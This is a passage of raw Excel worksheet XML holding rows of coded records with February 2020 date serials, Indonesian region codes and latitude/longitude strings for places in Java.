      <c r="F594" t="s">
        <v>2556</v>
      </c>
      <c r="G594" t="s">
        <v>2557</v>
      </c>
      <c r="H594" t="s">
        <v>26</v>
      </c>
      <c r="I594" t="s">
        <v>1633</v>
      </c>
      <c r="J594" t="s">
        <v>2558</v>
      </c>
      <c r="L594" t="s">
        <v>2559</v>
      </c>
      <c r="M594">
        <v>3175050001</v>
      </c>
      <c r="N594">
        <v>3175050</v>
      </c>
      <c r="O594">
        <v>3175</v>
      </c>
      <c r="P594">
        <v>31</v>
      </c>
      <c r="Q594" t="s">
        <v>1037</v>
      </c>
      <c r="R594" t="s">
        <v>1013</v>
      </c>
      <c r="S594" t="s">
        <v>547</v>
      </c>
      <c r="T594" t="s">
        <v>33</v>
      </c>
      <c r="U594" s="5">
        <v>10688476</v>
      </c>
      <c r="V594" s="5" t="s">
        <v>15005</v>
      </c>
      <c r="W594" s="5">
        <v>-616915</v>
      </c>
      <c r="X594" t="s">
        <v>18811</v>
      </c>
      <c r="Y594" t="str">
        <f t="shared" si="9"/>
        <v>-6.16915,106.88476</v>
      </c>
    </row>
    <row r="595" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A595">
        <v>102320</v>
      </c>
      <c r="B595" s="1">
        <v>43869</v>
      </c>
      <c r="C595">
        <v>0</v>
      </c>
      <c r="D595" t="s">
        <v>22</v>
      </c>
      <c r="E595" t="s">
        <v>23</v>
      </c>
      <c r="F595" t="s">
        <v>2560</v>
      </c>
      <c r="G595" t="s">
        <v>2561</v>
      </c>
      <c r="H595" t="s">
        <v>26</v>
      </c>
      <c r="I595" t="s">
        <v>2562</v>
      </c>
      <c r="J595" t="s">
        <v>93</v>
      </c>
      <c r="L595" t="s">
        <v>2563</v>
      </c>
      <c r="M595">
        <v>3174020007</v>
      </c>
      <c r="N595">
        <v>3174020</v>
      </c>
      <c r="O595">
        <v>3174</v>
      </c>
      <c r="P595">
        <v>31</v>
      </c>
      <c r="Q595" t="s">
        <v>95</v>
      </c>
      <c r="R595" t="s">
        <v>31</v>
      </c>
      <c r="S595" t="s">
        <v>32</v>
      </c>
      <c r="T595" t="s">
        <v>33</v>
      </c>
      <c r="U595" s="5">
        <v>10676227</v>
      </c>
      <c r="V595" s="5" t="s">
        <v>15006</v>
      </c>
      <c r="W595" s="5">
        <v>-616026</v>
      </c>
      <c r="X595" t="s">
        <v>18812</v>
      </c>
      <c r="Y595" t="str">
        <f t="shared" si="9"/>
        <v>-6.16026,106.76227</v>
      </c>
    </row>
    <row r="596" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A596">
        <v>102321</v>
      </c>
      <c r="B596" s="1">
        <v>43869</v>
      </c>
      <c r="C596">
        <v>0</v>
      </c>
      <c r="D596" t="s">
        <v>22</v>
      </c>
      <c r="E596" t="s">
        <v>23</v>
      </c>
      <c r="F596" t="s">
        <v>2564</v>
      </c>
      <c r="H596" t="s">
        <v>26</v>
      </c>
      <c r="I596" t="s">
        <v>1046</v>
      </c>
      <c r="J596" t="s">
        <v>2565</v>
      </c>
      <c r="L596" t="s">
        <v>917</v>
      </c>
      <c r="M596">
        <v>3172090006</v>
      </c>
      <c r="N596">
        <v>3172090</v>
      </c>
      <c r="O596">
        <v>3172</v>
      </c>
      <c r="P596">
        <v>31</v>
      </c>
      <c r="Q596" t="s">
        <v>2283</v>
      </c>
      <c r="R596" t="s">
        <v>890</v>
      </c>
      <c r="S596" t="s">
        <v>49</v>
      </c>
      <c r="T596" t="s">
        <v>33</v>
      </c>
      <c r="U596" s="5">
        <v>10688262</v>
      </c>
      <c r="V596" s="5" t="s">
        <v>15007</v>
      </c>
      <c r="W596" s="5">
        <v>-617437</v>
      </c>
      <c r="X596" t="s">
        <v>18813</v>
      </c>
      <c r="Y596" t="str">
        <f t="shared" si="9"/>
        <v>-6.17437,106.88262</v>
      </c>
    </row>
    <row r="597" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A597">
        <v>102322</v>
      </c>
      <c r="B597" s="1">
        <v>43869</v>
      </c>
      <c r="C597">
        <v>0</v>
      </c>
      <c r="D597" t="s">
        <v>22</v>
      </c>
      <c r="E597" t="s">
        <v>23</v>
      </c>
      <c r="F597" t="s">
        <v>2566</v>
      </c>
      <c r="G597" t="s">
        <v>2567</v>
      </c>
      <c r="H597" t="s">
        <v>26</v>
      </c>
      <c r="I597" t="s">
        <v>1359</v>
      </c>
      <c r="J597" t="s">
        <v>2568</v>
      </c>
      <c r="M597">
        <v>3175060006</v>
      </c>
      <c r="N597">
        <v>3175060</v>
      </c>
      <c r="O597">
        <v>3175</v>
      </c>
      <c r="P597">
        <v>31</v>
      </c>
      <c r="Q597" t="s">
        <v>2409</v>
      </c>
      <c r="R597" t="s">
        <v>2279</v>
      </c>
      <c r="S597" t="s">
        <v>547</v>
      </c>
      <c r="T597" t="s">
        <v>33</v>
      </c>
      <c r="U597" s="5">
        <v>10692300</v>
      </c>
      <c r="V597" s="5" t="s">
        <v>15008</v>
      </c>
      <c r="W597" s="5">
        <v>-611702</v>
      </c>
      <c r="X597" t="s">
        <v>18814</v>
      </c>
      <c r="Y597" t="str">
        <f t="shared" si="9"/>
        <v>-6.11702,106.92300</v>
      </c>
    </row>
    <row r="598" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A598">
        <v>102323</v>
      </c>
      <c r="B598" s="1">
        <v>43869</v>
      </c>
      <c r="C598">
        <v>0</v>
      </c>
      <c r="D598" t="s">
        <v>22</v>
      </c>
      <c r="E598" t="s">
        <v>23</v>
      </c>
      <c r="F598" t="s">
        <v>2569</v>
      </c>
      <c r="G598" t="s">
        <v>2570</v>
      </c>
      <c r="H598" t="s">
        <v>26</v>
      </c>
      <c r="I598" t="s">
        <v>65</v>
      </c>
      <c r="J598" t="s">
        <v>2268</v>
      </c>
      <c r="L598" t="s">
        <v>250</v>
      </c>
      <c r="M598">
        <v>3175030002</v>
      </c>
      <c r="N598">
        <v>3175030</v>
      </c>
      <c r="O598">
        <v>3175</v>
      </c>
      <c r="P598">
        <v>31</v>
      </c>
      <c r="Q598" t="s">
        <v>1592</v>
      </c>
      <c r="R598" t="s">
        <v>1563</v>
      </c>
      <c r="S598" t="s">
        <v>547</v>
      </c>
      <c r="T598" t="s">
        <v>33</v>
      </c>
      <c r="U598" s="5">
        <v>10686284</v>
      </c>
      <c r="V598" s="5" t="s">
        <v>15009</v>
      </c>
      <c r="W598" s="5">
        <v>-615516</v>
      </c>
      <c r="X598" t="s">
        <v>18815</v>
      </c>
      <c r="Y598" t="str">
        <f t="shared" si="9"/>
        <v>-6.15516,106.86284</v>
      </c>
    </row>
    <row r="599" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A599">
        <v>102324</v>
      </c>
      <c r="B599" s="1">
        <v>43869</v>
      </c>
      <c r="C599">
        <v>0</v>
      </c>
      <c r="D599" t="s">
        <v>22</v>
      </c>
      <c r="E599" t="s">
        <v>23</v>
      </c>
      <c r="F599" t="s">
        <v>2571</v>
      </c>
      <c r="G599" t="s">
        <v>2572</v>
      </c>
      <c r="H599" t="s">
        <v>26</v>
      </c>
      <c r="I599" t="s">
        <v>882</v>
      </c>
      <c r="J599" t="s">
        <v>2573</v>
      </c>
      <c r="L599" t="s">
        <v>2574</v>
      </c>
      <c r="M599">
        <v>3175050003</v>
      </c>
      <c r="N599">
        <v>3175050</v>
      </c>
      <c r="O599">
        <v>3175</v>
      </c>
      <c r="P599">
        <v>31</v>
      </c>
      <c r="Q599" t="s">
        <v>1740</v>
      </c>
      <c r="R599" t="s">
        <v>1013</v>
      </c>
      <c r="S599" t="s">
        <v>547</v>
      </c>
      <c r="T599" t="s">
        <v>33</v>
      </c>
      <c r="U599" s="5">
        <v>10692117</v>
      </c>
      <c r="V599" s="5" t="s">
        <v>15010</v>
      </c>
      <c r="W599" s="5">
        <v>-616191</v>
      </c>
      <c r="X599" t="s">
        <v>18816</v>
      </c>
      <c r="Y599" t="str">
        <f t="shared" si="9"/>
        <v>-6.16191,106.92117</v>
      </c>
    </row>
    <row r="600" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A600">
        <v>102325</v>
      </c>
      <c r="B600" s="1">
        <v>43869</v>
      </c>
      <c r="C600">
        <v>0</v>
      </c>
      <c r="D600" t="s">
        <v>22</v>
      </c>
      <c r="E600" t="s">
        <v>23</v>
      </c>
      <c r="F600" t="s">
        <v>2575</v>
      </c>
      <c r="G600" t="s">
        <v>2576</v>
      </c>
      <c r="H600" t="s">
        <v>26</v>
      </c>
      <c r="I600" t="s">
        <v>732</v>
      </c>
      <c r="J600" t="s">
        <v>2369</v>
      </c>
      <c r="L600" t="s">
        <v>2577</v>
      </c>
      <c r="M600">
        <v>3175050001</v>
      </c>
      <c r="N600">
        <v>3175050</v>
      </c>
      <c r="O600">
        <v>3175</v>
      </c>
      <c r="P600">
        <v>31</v>
      </c>
      <c r="Q600" t="s">
        <v>1037</v>
      </c>
      <c r="R600" t="s">
        <v>1013</v>
      </c>
      <c r="S600" t="s">
        <v>547</v>
      </c>
      <c r="T600" t="s">
        <v>33</v>
      </c>
      <c r="U600" s="5">
        <v>10689246</v>
      </c>
      <c r="V600" s="5" t="s">
        <v>15011</v>
      </c>
      <c r="W600" s="5">
        <v>-615457</v>
      </c>
      <c r="X600" t="s">
        <v>18465</v>
      </c>
      <c r="Y600" t="str">
        <f t="shared" si="9"/>
        <v>-6.15457,106.89246</v>
      </c>
    </row>
    <row r="601" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A601">
        <v>102327</v>
      </c>
      <c r="B601" s="1">
        <v>43869</v>
      </c>
      <c r="C601">
        <v>0</v>
      </c>
      <c r="D601" t="s">
        <v>22</v>
      </c>
      <c r="E601" t="s">
        <v>23</v>
      </c>
      <c r="F601" t="s">
        <v>2578</v>
      </c>
      <c r="G601" t="s">
        <v>2579</v>
      </c>
      <c r="H601" t="s">
        <v>26</v>
      </c>
      <c r="I601" t="s">
        <v>1253</v>
      </c>
      <c r="J601" t="s">
        <v>2580</v>
      </c>
      <c r="L601" t="s">
        <v>2581</v>
      </c>
      <c r="M601">
        <v>3172040005</v>
      </c>
      <c r="N601">
        <v>3172040</v>
      </c>
      <c r="O601">
        <v>3172</v>
      </c>
      <c r="P601">
        <v>31</v>
      </c>
      <c r="Q601" t="s">
        <v>1351</v>
      </c>
      <c r="R601" t="s">
        <v>281</v>
      </c>
      <c r="S601" t="s">
        <v>49</v>
      </c>
      <c r="T601" t="s">
        <v>33</v>
      </c>
      <c r="U601" s="5">
        <v>10689732</v>
      </c>
      <c r="V601" s="5" t="s">
        <v>15012</v>
      </c>
      <c r="W601" s="5">
        <v>-624316</v>
      </c>
      <c r="X601" t="s">
        <v>18817</v>
      </c>
      <c r="Y601" t="str">
        <f t="shared" si="9"/>
        <v>-6.24316,106.89732</v>
      </c>
    </row>
    <row r="602" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A602">
        <v>102329</v>
      </c>
      <c r="B602" s="1">
        <v>43869</v>
      </c>
      <c r="C602">
        <v>0</v>
      </c>
      <c r="D602" t="s">
        <v>22</v>
      </c>
      <c r="E602" t="s">
        <v>23</v>
      </c>
      <c r="F602" t="s">
        <v>2582</v>
      </c>
      <c r="G602" t="s">
        <v>2583</v>
      </c>
      <c r="H602" t="s">
        <v>26</v>
      </c>
      <c r="I602" t="s">
        <v>1633</v>
      </c>
      <c r="J602" t="s">
        <v>2438</v>
      </c>
      <c r="L602" t="s">
        <v>2584</v>
      </c>
      <c r="M602">
        <v>3175050003</v>
      </c>
      <c r="N602">
        <v>3175050</v>
      </c>
      <c r="O602">
        <v>3175</v>
      </c>
      <c r="P602">
        <v>31</v>
      </c>
      <c r="Q602" t="s">
        <v>1740</v>
      </c>
      <c r="R602" t="s">
        <v>1013</v>
      </c>
      <c r="S602" t="s">
        <v>547</v>
      </c>
      <c r="T602" t="s">
        <v>33</v>
      </c>
      <c r="U602" s="5">
        <v>10691021</v>
      </c>
      <c r="V602" s="5" t="s">
        <v>15013</v>
      </c>
      <c r="W602" s="5">
        <v>-614528</v>
      </c>
      <c r="X602" t="s">
        <v>18818</v>
      </c>
      <c r="Y602" t="str">
        <f t="shared" si="9"/>
        <v>-6.14528,106.91021</v>
      </c>
    </row>
    <row r="603" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A603">
        <v>102330</v>
      </c>
      <c r="B603" s="1">
        <v>43869</v>
      </c>
      <c r="C603">
        <v>0</v>
      </c>
      <c r="D603" t="s">
        <v>22</v>
      </c>
      <c r="E603" t="s">
        <v>23</v>
      </c>
      <c r="F603" t="s">
        <v>2585</v>
      </c>
      <c r="G603" t="s">
        <v>2586</v>
      </c>
      <c r="H603" t="s">
        <v>26</v>
      </c>
      <c r="I603" t="s">
        <v>65</v>
      </c>
      <c r="J603" t="s">
        <v>1460</v>
      </c>
      <c r="L603" t="s">
        <v>2587</v>
      </c>
      <c r="M603">
        <v>3204110007</v>
      </c>
      <c r="N603">
        <v>3204110</v>
      </c>
      <c r="O603">
        <v>3204</v>
      </c>
      <c r="P603">
        <v>32</v>
      </c>
      <c r="Q603" t="s">
        <v>2588</v>
      </c>
      <c r="R603" t="s">
        <v>2126</v>
      </c>
      <c r="S603" t="s">
        <v>1464</v>
      </c>
      <c r="T603" t="s">
        <v>42</v>
      </c>
      <c r="U603" s="5">
        <v>10778901</v>
      </c>
      <c r="V603" s="5" t="s">
        <v>15014</v>
      </c>
      <c r="W603" s="5">
        <v>-696656</v>
      </c>
      <c r="X603" t="s">
        <v>18819</v>
      </c>
      <c r="Y603" t="str">
        <f t="shared" si="9"/>
        <v>-6.96656,107.78901</v>
      </c>
    </row>
    <row r="604" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A604">
        <v>102331</v>
      </c>
      <c r="B604" s="1">
        <v>43869</v>
      </c>
      <c r="C604">
        <v>0</v>
      </c>
      <c r="D604" t="s">
        <v>22</v>
      </c>
      <c r="E604" t="s">
        <v>23</v>
      </c>
      <c r="F604" s="3" t="s">
        <v>2589</v>
      </c>
      <c r="H604" t="s">
        <v>26</v>
      </c>
      <c r="I604" t="s">
        <v>1263</v>
      </c>
      <c r="J604" t="s">
        <v>2590</v>
      </c>
      <c r="L604" t="s">
        <v>2591</v>
      </c>
      <c r="M604">
        <v>3173020002</v>
      </c>
      <c r="N604">
        <v>3173020</v>
      </c>
      <c r="O604">
        <v>3173</v>
      </c>
      <c r="P604">
        <v>31</v>
      </c>
      <c r="Q604" t="s">
        <v>2592</v>
      </c>
      <c r="R604" t="s">
        <v>179</v>
      </c>
      <c r="S604" t="s">
        <v>62</v>
      </c>
      <c r="T604" t="s">
        <v>33</v>
      </c>
      <c r="U604" s="5">
        <v>10685054</v>
      </c>
      <c r="V604" s="5" t="s">
        <v>15015</v>
      </c>
      <c r="W604" s="5">
        <v>-620100</v>
      </c>
      <c r="X604" t="s">
        <v>18820</v>
      </c>
      <c r="Y604" t="str">
        <f t="shared" si="9"/>
        <v>-6.20100,106.85054</v>
      </c>
    </row>
    <row r="605" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A605">
        <v>102332</v>
      </c>
      <c r="B605" s="1">
        <v>43869</v>
      </c>
      <c r="C605">
        <v>1</v>
      </c>
      <c r="D605" t="s">
        <v>22</v>
      </c>
      <c r="E605" t="s">
        <v>23</v>
      </c>
      <c r="F605" t="s">
        <v>2593</v>
      </c>
      <c r="G605" t="s">
        <v>2594</v>
      </c>
      <c r="H605" t="s">
        <v>26</v>
      </c>
      <c r="I605" t="s">
        <v>1538</v>
      </c>
      <c r="J605" t="s">
        <v>2595</v>
      </c>
      <c r="M605">
        <v>3175050003</v>
      </c>
      <c r="N605">
        <v>3175050</v>
      </c>
      <c r="O605">
        <v>3175</v>
      </c>
      <c r="P605">
        <v>31</v>
      </c>
      <c r="Q605" t="s">
        <v>1740</v>
      </c>
      <c r="R605" t="s">
        <v>1013</v>
      </c>
      <c r="S605" t="s">
        <v>547</v>
      </c>
      <c r="T605" t="s">
        <v>33</v>
      </c>
      <c r="U605" s="5">
        <v>10691193</v>
      </c>
      <c r="V605" s="5" t="s">
        <v>15016</v>
      </c>
      <c r="W605" s="5">
        <v>-617215</v>
      </c>
      <c r="X605" t="s">
        <v>18821</v>
      </c>
      <c r="Y605" t="str">
        <f t="shared" si="9"/>
        <v>-6.17215,106.91193</v>
      </c>
    </row>
    <row r="606" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A606">
        <v>102335</v>
      </c>
      <c r="B606" s="1">
        <v>43870</v>
      </c>
      <c r="C606">
        <v>0</v>
      </c>
      <c r="D606" t="s">
        <v>22</v>
      </c>
      <c r="E606" t="s">
        <v>23</v>
      </c>
      <c r="F606" t="s">
        <v>2596</v>
      </c>
      <c r="G606" t="s">
        <v>2597</v>
      </c>
      <c r="H606" t="s">
        <v>26</v>
      </c>
      <c r="I606" t="s">
        <v>2598</v>
      </c>
      <c r="J606" t="s">
        <v>2599</v>
      </c>
      <c r="L606" t="s">
        <v>2600</v>
      </c>
      <c r="M606">
        <v>3174030004</v>
      </c>
      <c r="N606">
        <v>3174030</v>
      </c>
      <c r="O606">
        <v>3174</v>
      </c>
      <c r="P606">
        <v>31</v>
      </c>
      <c r="Q606" t="s">
        <v>2601</v>
      </c>
      <c r="R606" t="s">
        <v>1487</v>
      </c>
      <c r="S606" t="s">
        <v>32</v>
      </c>
      <c r="T606" t="s">
        <v>33</v>
      </c>
      <c r="U606" s="5">
        <v>10679874</v>
      </c>
      <c r="V606" s="5" t="s">
        <v>15017</v>
      </c>
      <c r="W606" s="5">
        <v>-618190</v>
      </c>
      <c r="X606" t="s">
        <v>18822</v>
      </c>
      <c r="Y606" t="str">
        <f t="shared" si="9"/>
        <v>-6.18190,106.79874</v>
      </c>
    </row>
    <row r="607" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A607">
        <v>102336</v>
      </c>
      <c r="B607" s="1">
        <v>43870</v>
      </c>
      <c r="C607">
        <v>0</v>
      </c>
      <c r="D607" t="s">
        <v>22</v>
      </c>
      <c r="E607" t="s">
        <v>23</v>
      </c>
      <c r="F607" t="s">
        <v>2602</v>
      </c>
      <c r="H607" t="s">
        <v>26</v>
      </c>
      <c r="I607" t="s">
        <v>2016</v>
      </c>
      <c r="J607" t="s">
        <v>2603</v>
      </c>
      <c r="L607" t="s">
        <v>2604</v>
      </c>
      <c r="M607">
        <v>3174040002</v>
      </c>
      <c r="N607">
        <v>3174040</v>
      </c>
      <c r="O607">
        <v>3174</v>
      </c>
      <c r="P607">
        <v>31</v>
      </c>
      <c r="Q607" t="s">
        <v>2605</v>
      </c>
      <c r="R607" t="s">
        <v>377</v>
      </c>
      <c r="S607" t="s">
        <v>32</v>
      </c>
      <c r="T607" t="s">
        <v>33</v>
      </c>
      <c r="U607" s="5">
        <v>10678769</v>
      </c>
      <c r="V607" s="5" t="s">
        <v>15018</v>
      </c>
      <c r="W607" s="5">
        <v>-617380</v>
      </c>
      <c r="X607" t="s">
        <v>18823</v>
      </c>
      <c r="Y607" t="str">
        <f t="shared" si="9"/>
        <v>-6.17380,106.78769</v>
      </c>
    </row>
    <row r="608" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A608">
        <v>103096</v>
      </c>
      <c r="B608" s="1">
        <v>43870</v>
      </c>
      <c r="C608">
        <v>0</v>
      </c>
      <c r="D608" t="s">
        <v>22</v>
      </c>
      <c r="E608" t="s">
        <v>23</v>
      </c>
      <c r="F608" t="s">
        <v>2606</v>
      </c>
      <c r="G608" t="s">
        <v>2607</v>
      </c>
      <c r="H608" t="s">
        <v>26</v>
      </c>
      <c r="I608" t="s">
        <v>893</v>
      </c>
      <c r="J608" t="s">
        <v>2608</v>
      </c>
      <c r="L608" t="s">
        <v>2609</v>
      </c>
      <c r="M608">
        <v>3323070004</v>
      </c>
      <c r="N608">
        <v>3323070</v>
      </c>
      <c r="O608">
        <v>3323</v>
      </c>
      <c r="P608">
        <v>33</v>
      </c>
      <c r="Q608" t="s">
        <v>2610</v>
      </c>
      <c r="R608" t="s">
        <v>2611</v>
      </c>
      <c r="S608" t="s">
        <v>2612</v>
      </c>
      <c r="T608" t="s">
        <v>1134</v>
      </c>
      <c r="U608" s="5">
        <v>11019974</v>
      </c>
      <c r="V608" s="5" t="s">
        <v>15019</v>
      </c>
      <c r="W608" s="5">
        <v>-726031</v>
      </c>
      <c r="X608" t="s">
        <v>18824</v>
      </c>
      <c r="Y608" t="str">
        <f t="shared" si="9"/>
        <v>-7.26031,110.19974</v>
      </c>
    </row>
    <row r="609" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A609">
        <v>105836</v>
      </c>
      <c r="B609" s="1">
        <v>43875</v>
      </c>
      <c r="C609">
        <v>1</v>
      </c>
      <c r="D609" t="s">
        <v>85</v>
      </c>
      <c r="E609" t="s">
        <v>23</v>
      </c>
      <c r="F609" t="s">
        <v>2613</v>
      </c>
      <c r="G609" t="s">
        <v>2614</v>
      </c>
      <c r="H609" t="s">
        <v>26</v>
      </c>
      <c r="J609" t="s">
        <v>2615</v>
      </c>
      <c r="K609" t="s">
        <v>2616</v>
      </c>
      <c r="L609" t="s">
        <v>2617</v>
      </c>
      <c r="M609">
        <v>3404050002</v>
      </c>
      <c r="N609">
        <v>3404050</v>
      </c>
      <c r="O609">
        <v>3404</v>
      </c>
      <c r="P609">
        <v>34</v>
      </c>
      <c r="Q609" t="s">
        <v>2618</v>
      </c>
      <c r="R609" t="s">
        <v>2619</v>
      </c>
      <c r="S609" t="s">
        <v>1855</v>
      </c>
      <c r="T609" t="s">
        <v>1856</v>
      </c>
      <c r="U609" s="5">
        <v>11032368</v>
      </c>
      <c r="V609" s="5" t="s">
        <v>15020</v>
      </c>
      <c r="W609" s="5">
        <v>-780082</v>
      </c>
      <c r="X609" t="s">
        <v>18825</v>
      </c>
      <c r="Y609" t="str">
        <f t="shared" si="9"/>
        <v>-7.80082,110.32368</v>
      </c>
    </row>
    <row r="610" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A610">
        <v>105837</v>
      </c>
      <c r="B610" s="1">
        <v>43875</v>
      </c>
      <c r="C610">
        <v>1</v>
      </c>
      <c r="D610" t="s">
        <v>85</v>
      </c>
      <c r="E610" t="s">
        <v>23</v>
      </c>
      <c r="F610" t="s">
        <v>2620</v>
      </c>
      <c r="G610" t="s">
        <v>2621</v>
      </c>
      <c r="H610" t="s">
        <v>26</v>
      </c>
      <c r="J610" t="s">
        <v>2622</v>
      </c>
      <c r="K610" t="s">
        <v>2623</v>
      </c>
      <c r="L610" t="s">
        <v>2624</v>
      </c>
      <c r="M610">
        <v>3577030005</v>
      </c>
      <c r="N610">
        <v>3577030</v>
      </c>
      <c r="O610">
        <v>3577</v>
      </c>
      <c r="P610">
        <v>35</v>
      </c>
      <c r="Q610" t="s">
        <v>1983</v>
      </c>
      <c r="R610" t="s">
        <v>1219</v>
      </c>
      <c r="S610" t="s">
        <v>1220</v>
      </c>
      <c r="T610" t="s">
        <v>1221</v>
      </c>
      <c r="U610" s="5">
        <v>11155689</v>
      </c>
      <c r="V610" s="5" t="s">
        <v>15021</v>
      </c>
      <c r="W610" s="5">
        <v>-760506</v>
      </c>
      <c r="X610" t="s">
        <v>18826</v>
      </c>
      <c r="Y610" t="str">
        <f t="shared" si="9"/>
        <v>-7.60506,111.55689</v>
      </c>
    </row>
    <row r="611" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A611">
        <v>105841</v>
      </c>
      <c r="B611" s="1">
        <v>43877</v>
      </c>
      <c r="C611">
        <v>0</v>
      </c>
      <c r="D611" t="s">
        <v>22</v>
      </c>
      <c r="E611" t="s">
        <v>23</v>
      </c>
      <c r="F611" t="s">
        <v>2625</v>
      </c>
      <c r="G611" t="s">
        <v>2626</v>
      </c>
      <c r="H611" t="s">
        <v>26</v>
      </c>
      <c r="I611" t="s">
        <v>27</v>
      </c>
      <c r="J611" t="s">
        <v>2627</v>
      </c>
      <c r="L611" t="s">
        <v>250</v>
      </c>
      <c r="M611">
        <v>3275010012</v>
      </c>
      <c r="N611">
        <v>3275010</v>
      </c>
      <c r="O611">
        <v>3275</v>
      </c>
      <c r="P611">
        <v>32</v>
      </c>
      <c r="Q611" t="s">
        <v>2322</v>
      </c>
      <c r="R611" t="s">
        <v>287</v>
      </c>
      <c r="S611" t="s">
        <v>41</v>
      </c>
      <c r="T611" t="s">
        <v>42</v>
      </c>
      <c r="U611" s="5">
        <v>10694078</v>
      </c>
      <c r="V611" s="5" t="s">
        <v>15022</v>
      </c>
      <c r="W611" s="5">
        <v>-626096</v>
      </c>
      <c r="X611" t="s">
        <v>18827</v>
      </c>
      <c r="Y611" t="str">
        <f t="shared" si="9"/>
        <v>-6.26096,106.94078</v>
      </c>
    </row>
    <row r="612" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A612">
        <v>105842</v>
      </c>
      <c r="B612" s="1">
        <v>43877</v>
      </c>
      <c r="C612">
        <v>0</v>
      </c>
      <c r="D612" t="s">
        <v>22</v>
      </c>
      <c r="E612" t="s">
        <v>23</v>
      </c>
      <c r="F612" t="s">
        <v>2628</v>
      </c>
      <c r="G612" t="s">
        <v>2629</v>
      </c>
      <c r="H612" t="s">
        <v>26</v>
      </c>
      <c r="I612" t="s">
        <v>1542</v>
      </c>
      <c r="J612" t="s">
        <v>2622</v>
      </c>
      <c r="L612" t="s">
        <v>2630</v>
      </c>
      <c r="M612">
        <v>3578060003</v>
      </c>
      <c r="N612">
        <v>3578060</v>
      </c>
      <c r="O612">
        <v>3578</v>
      </c>
      <c r="P612">
        <v>35</v>
      </c>
      <c r="Q612" t="s">
        <v>2631</v>
      </c>
      <c r="R612" t="s">
        <v>2631</v>
      </c>
      <c r="S612" t="s">
        <v>1346</v>
      </c>
      <c r="T612" t="s">
        <v>1221</v>
      </c>
      <c r="U612" s="5">
        <v>11279820</v>
      </c>
      <c r="V612" s="5" t="s">
        <v>15023</v>
      </c>
      <c r="W612" s="5">
        <v>-733308</v>
      </c>
      <c r="X612" t="s">
        <v>18828</v>
      </c>
      <c r="Y612" t="str">
        <f t="shared" si="9"/>
        <v>-7.33308,112.79820</v>
      </c>
    </row>
    <row r="613" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A613">
        <v>105844</v>
      </c>
      <c r="B613" s="1">
        <v>43877</v>
      </c>
      <c r="C613">
        <v>0</v>
      </c>
      <c r="D613" t="s">
        <v>22</v>
      </c>
      <c r="E613" t="s">
        <v>23</v>
      </c>
      <c r="F613" t="s">
        <v>2632</v>
      </c>
      <c r="G613" t="s">
        <v>2633</v>
      </c>
      <c r="H613" t="s">
        <v>26</v>
      </c>
      <c r="I613" t="s">
        <v>1263</v>
      </c>
      <c r="J613" t="s">
        <v>2627</v>
      </c>
      <c r="L613" t="s">
        <v>2634</v>
      </c>
      <c r="M613">
        <v>3201130004</v>
      </c>
      <c r="N613">
        <v>3201130</v>
      </c>
      <c r="O613">
        <v>3201</v>
      </c>
      <c r="P613">
        <v>32</v>
      </c>
      <c r="Q613" t="s">
        <v>2635</v>
      </c>
      <c r="R613" t="s">
        <v>2636</v>
      </c>
      <c r="S613" t="s">
        <v>421</v>
      </c>
      <c r="T613" t="s">
        <v>42</v>
      </c>
      <c r="U613" s="5">
        <v>10684050</v>
      </c>
      <c r="V613" s="5" t="s">
        <v>15024</v>
      </c>
      <c r="W613" s="5">
        <v>-660945</v>
      </c>
      <c r="X613" t="s">
        <v>18829</v>
      </c>
      <c r="Y613" t="str">
        <f t="shared" si="9"/>
        <v>-6.60945,106.84050</v>
      </c>
    </row>
    <row r="614" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A614">
        <v>105845</v>
      </c>
      <c r="B614" s="1">
        <v>43877</v>
      </c>
      <c r="C614">
        <v>0</v>
      </c>
      <c r="D614" t="s">
        <v>22</v>
      </c>
      <c r="E614" t="s">
        <v>23</v>
      </c>
      <c r="F614" t="s">
        <v>2637</v>
      </c>
      <c r="G614" t="s">
        <v>2638</v>
      </c>
      <c r="H614" t="s">
        <v>26</v>
      </c>
      <c r="I614" t="s">
        <v>65</v>
      </c>
      <c r="J614" t="s">
        <v>2608</v>
      </c>
      <c r="L614" t="s">
        <v>2639</v>
      </c>
      <c r="M614">
        <v>3301030006</v>
      </c>
      <c r="N614">
        <v>3301030</v>
      </c>
      <c r="O614">
        <v>3301</v>
      </c>
      <c r="P614">
        <v>33</v>
      </c>
      <c r="Q614" t="s">
        <v>2640</v>
      </c>
      <c r="R614" t="s">
        <v>2641</v>
      </c>
      <c r="S614" t="s">
        <v>2642</v>
      </c>
      <c r="T614" t="s">
        <v>1134</v>
      </c>
      <c r="U614" s="5">
        <v>10877457</v>
      </c>
      <c r="V614" s="5" t="s">
        <v>15025</v>
      </c>
      <c r="W614" s="5">
        <v>-730022</v>
      </c>
      <c r="X614" t="s">
        <v>18830</v>
      </c>
      <c r="Y614" t="str">
        <f t="shared" si="9"/>
        <v>-7.30022,108.77457</v>
      </c>
    </row>
    <row r="615" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A615">
        <v>105846</v>
      </c>
      <c r="B615" s="1">
        <v>43877</v>
      </c>
      <c r="C615">
        <v>1</v>
      </c>
      <c r="D615" t="s">
        <v>22</v>
      </c>
      <c r="E615" t="s">
        <v>23</v>
      </c>
      <c r="F615" t="s">
        <v>2643</v>
      </c>
      <c r="H615" t="s">
        <v>26</v>
      </c>
      <c r="I615" t="s">
        <v>1909</v>
      </c>
      <c r="J615" t="s">
        <v>481</v>
      </c>
      <c r="L615" t="s">
        <v>250</v>
      </c>
      <c r="M615">
        <v>3171020005</v>
      </c>
      <c r="N615">
        <v>3171020</v>
      </c>
      <c r="O615">
        <v>3171</v>
      </c>
      <c r="P615">
        <v>31</v>
